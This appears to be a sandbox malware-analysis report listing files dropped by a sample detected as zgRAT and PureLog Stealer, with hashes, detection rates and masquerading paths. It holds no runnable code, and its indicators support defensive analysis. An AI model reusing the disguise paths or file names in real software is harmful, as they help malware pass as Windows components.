                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2705596
                                                                                            Entropy (8bit):7.601024437340247
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:IBJTds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEBH:yVdd+9YPEWg/q3Jqhd6yrChMaH
                                                                                            MD5:693F4A6FC50DDA899DE3F006DE04951E
                                                                                            SHA1:01ACBE1FCD56906D2F8A4DC24E98D396D1C0ABE3
                                                                                            SHA-256:ACE4474F28AB83A152D7F14F2701754DB1EEB7A4A04AC4AFDF65C6C6F4709B68
                                                                                            SHA-512:4AA5022052EA762F87F421F90B640F85B32CF3714807B93B6801FD4286DA2311AAAEB5FE7DA3780298A3A1B404976E3E5B18E29A2DBDDFF5BDE687AD61DEA903
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.293660689688184
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:MCXAESmw:tvw
                                                                                            MD5:E08A7734854F9985D069131E3C9B0E8D
                                                                                            SHA1:FADC21AEC26024673C1127223545EB0380D5BAAE
                                                                                            SHA-256:C7C86AA043E66033E62CFF407B59617765569ED39FC460B50B67B8E9E62BBFA8
                                                                                            SHA-512:65222D9D92F44E2C4A11AE86CCDCC7B17C556BF2F7460ED4244EB313BD85CB21370339FB4CF5BB1A4B43FB0CE1678088ADF5CB610672B12E339A9975A468C7A4
                                                                                            Malicious:false
                                                                                            Preview:Jac6UEbreNh5mUDCqiN3lwEFU
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1168
                                                                                            Entropy (8bit):4.4588400330616
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:mZxT0uZhN1+hBPNnqNdt4+lEbNFjMyi07:yuul1+hzqTSfbNtme
                                                                                            MD5:BF38FE42913AAAB3060562F036C56781
                                                                                            SHA1:2569E40A60E393E85BE2C50CFA830C2E1430822C
                                                                                            SHA-256:0E8F131AD2ED72FDDAEA0919A88AEDFA09CFE5AE30F6FD675AB1FD7ECE211CAC
                                                                                            SHA-512:42D67ABD60177063DC22601C7B0C76AA53000D3196A2BB4C123D2992B907518850C767B2097E0663941AE6C292D95EF08569156E2A286E996662D541D6986F86
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...U.p.d.a.t.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...U.p.d.a.t.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.871183095960517
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6MamLPtixZ8RxeOAEFJ+cV4MKe2eXdTRvvqBHfuul1+hzqXSfbNtm:1PNxvNVx93fvvkxXktzNt
                                                                                            MD5:24FB45BCE32AC5C76ECDF3996F8FDE80
                                                                                            SHA1:E52930E8273D1F29DF9F81087A3486B96232A878
                                                                                            SHA-256:46AA4EB0D9A91C44260EE84A483628ADC8B66226280FD2807114027DF53B06E0
                                                                                            SHA-512:DB57607E18117EE5FA9FDADBC777E926A0FE272D3B03772CF83827F90CD1C4AC16DBFB32BF191A425B36861775561E0DEE11C9F0622FC712C9B4C7366676E4CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.871183095960517
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6MamLPtixZ8RxeOAEFJ+cV4MKe2eXdTRvvqBHfuul1+hzqXSfbNtm:1PNxvNVx93fvvkxXktzNt
                                                                                            MD5:24FB45BCE32AC5C76ECDF3996F8FDE80
                                                                                            SHA1:E52930E8273D1F29DF9F81087A3486B96232A878
                                                                                            SHA-256:46AA4EB0D9A91C44260EE84A483628ADC8B66226280FD2807114027DF53B06E0
                                                                                            SHA-512:DB57607E18117EE5FA9FDADBC777E926A0FE272D3B03772CF83827F90CD1C4AC16DBFB32BF191A425B36861775561E0DEE11C9F0622FC712C9B4C7366676E4CA
                                                                                            Malicious:true
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (307), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):307
                                                                                            Entropy (8bit):5.80224838093525
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:/kBuFRq3yDNdwbasZtxzT4DCmnYgfMWeW1TjU8sQuYawbB4:kurq3kdw1Zty+mYg0WeWZjIQuYawC
                                                                                            MD5:D107EF47326957BEE65E0ADAD1010380
                                                                                            SHA1:685BC3C1A32E1729D9080DDEEDDD802993FAA082
                                                                                            SHA-256:93EF47DE89342BA31F5C95C9619DEB9837728BE4EA233485C2FE9FD8059995E0
                                                                                            SHA-512:2F0A397202196C812651F7F1EDE24DF71C198425B1B0BC657B1E351F4D4E881D91A566175D67EB4388289D1B4DEC0473762A90BDAC78E6A0B92822EAA79CB2EA
                                                                                            Malicious:false
                                                                                            Preview:gSwhMgoNmpAuQfkflYZY14irie77qq2NMLsoAmi0ouiwVJNpIM4MvfaltE8sjrg6xxhEx5f9zjuHWwWZQRzevpbruG45n0R7Nl8hlJ2Nq5WLuTP7rjbR1CLHWzTqAjV9Sx3vxzxHYlxzSP7b17ODY9FLZ1LwzLMHjX36adJ2vU3QPVzG22zDVSkTssV6oBRNZqP5WAAYyVREGy5DBE37WJvRwkOsHMNuCp1iG4t11bO9AgN3wS5jHT1P58IwwSQmHhBa7W7HVCG45vRPXU5zQomsylnHv7EiKm2cew6ZUyOEN6UJq2Z
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38400
                                                                                            Entropy (8bit):5.699005826018714
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                            MD5:87765D141228784AE91334BAE25AD743
                                                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):46592
                                                                                            Entropy (8bit):5.870612048031897
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38912
                                                                                            Entropy (8bit):5.679286635687991
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):36352
                                                                                            Entropy (8bit):5.668291349855899
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):50176
                                                                                            Entropy (8bit):5.723168999026349
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33792
                                                                                            Entropy (8bit):5.541771649974822
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):34304
                                                                                            Entropy (8bit):5.618776214605176
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):40448
                                                                                            Entropy (8bit):5.7028690200758465
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):34816
                                                                                            Entropy (8bit):5.636032516496583
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1224
                                                                                            Entropy (8bit):4.435108676655666
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.9379462519300814
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:69jp/PttM7Jt8Bs3FJsdcV4MKe27JdTRPvqBHSOulajfqXSfbNtm:YPkPc+Vx9MBPvk8cjRzNt
                                                                                            MD5:9DFA569D675CDA2E8C31DE1F651AAF16
                                                                                            SHA1:96DD3DD5EF422E733E2ED435E653E4798B094A95
                                                                                            SHA-256:AEAAF72273B4CD34276D7C7BFF9FA222B83A4D42C115967E9355C89BA283DBFA
                                                                                            SHA-512:818E95B7CB980BE48B24AC935DEB87A6BFCCDBCB25B4E1B52A47B8A344B50BA1B903309EFA5BF9610A7BB860F8BB71248DCA35613DBD4032777E80235B9FCB78
                                                                                            Malicious:true
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):114
                                                                                            Entropy (8bit):5.595760027524405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:eRwY9Q/yfzfDCR1ow5gcDIo+xVEGS6Xn:eR9yE2zZs7jEQXn
                                                                                            MD5:164CE56DBC705CC0DD96DEB5E911EAA0
                                                                                            SHA1:774CD2CD02045626C0C816371D0BEC3165812AF3
                                                                                            SHA-256:D00B953E79210C776E6408D925F5CD8E0500E502BE9575A58826F078A7105D9F
                                                                                            SHA-512:C7A60EEA6BB217310601D3C8067AB3B9BE3D06B5478E684D92AA99F8903C639095733F1EB48EA0EC2AD21A8DF46FA81B1EA2FF54E490768AD2E85A278A5C1020
                                                                                            Malicious:false
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (402), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):402
                                                                                            Entropy (8bit):5.856540162612455
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ue+w0UnX91RmLEm5CSiyvmCwBZxSzcN8X24m1PRX1zdCi5GAx+MFfAYFcs14T+uD:ueF0UULUuOiEtx1PN1zdt7vFfKUB+
                                                                                            MD5:D641179E570E5ABBA147E9DFA559684F
                                                                                            SHA1:C7797BD1221A0CE3EC25F5618FEE47234B67B4C2
                                                                                            SHA-256:CB4957F0BDF9124595A5DD403CEA3A7E827FE705A166FB529AB30D5A3B4A973A
                                                                                            SHA-512:31B2470763921549075B80268FBF496313875D29AE04224DDC16668B57F043E7E7EF0D6BE0E36823F3F21928A4DF3FC2316EE41E9743FEAB5D94E4A90D07DD0F
                                                                                            Malicious:false
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (613), with no line terminators
                                                                                            Category:dropped
